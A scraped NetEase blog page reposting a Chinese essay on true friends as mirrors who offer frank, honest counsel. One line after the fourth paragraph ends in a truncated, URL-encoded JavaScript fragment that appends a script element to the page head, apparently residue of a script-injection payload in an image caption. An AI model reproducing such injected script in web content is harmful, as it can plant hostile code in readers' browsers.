注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

马龙的博客

想我了就给我留言

 
 
 

日志

 
 
关于我

忙忙碌碌

网易考拉推荐

【引用】知己如明镜  

2011-08-20 12:51:36|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
本文转载自风月无边《知己如明镜》
在茫茫人海中,你是否曾经发现一双眸子,在他的澄澈中你看到了涓涓的清流、碧透的蓝天。

                  人的一生中要与许多人并肩而行,也会与多人擦肩而过。俯仰之间,我们对朋友有了期待,他应如钟子期,灵犀间与俞伯牙有了高山流水般的心灵交融;他应如鲍叔牙,在战乱中不计前嫌对管仲无私的举荐;但他更应如一面明镜,在你困顿、迷茫时,向你发出忠诚的诤言。

                   一个诤友,一句诤言,一面明镜,会如同利剑般划破心灵的阴暗,驱除甜言蜜语的勒绊,活脱出心灵的纯然。

                   不用劳心地去寻找诤友,其实他早已在你身边,也许他过于卑微,你无意间忽视了他的肺腑之言;也许他过于直白,他从不掩饰什么,箴言损伤了你那脆弱敏感的自尊。不要因为砂砾丑陋,就忽略了蕴藏于其中的水晶;不要因为目光冷峻,就忽视它反射的同样也是太阳的光辉。在你洋洋自得时,只有他会告诉你人生的艰险;在你心灰意冷时,只有他会为你播撒春日的阳光,在你心中播下新的希望。

知己如明镜 - 風月无边 - 754677295的博客cript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A">

                  不要犹豫,你确定他是你的知己,那就敞开胸怀拥抱他,无需刻意的表现,更无需刻意的渲染;在知己间只有君子之交淡如水的坦然;只有出淤泥而不染的高洁;只有大漠孤烟直、黄河落日圆的豪迈;只有梅花苦寒傲冰雪的圣洁;与他的对话洗去了你心灵的污点;与他的交谈荡涤了你尘封已久的灵魂。

                 清晨,推开窗,阳光洒向了你惺忪的睡眼;也许你会被他刺痛,脸颊上泛起晶莹的银河,然而透过这片晶莹折射的竟是人生的七彩。为自己身边留一面明镜吧,从此你的人生又多了一片蓝天;为自己的身边留一面明镜,从此你的世界不再孤单,又多了一个太阳。我愿为你奉献一双澄澈的双眸,你呢?

  评论这张
 
阅读(11)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018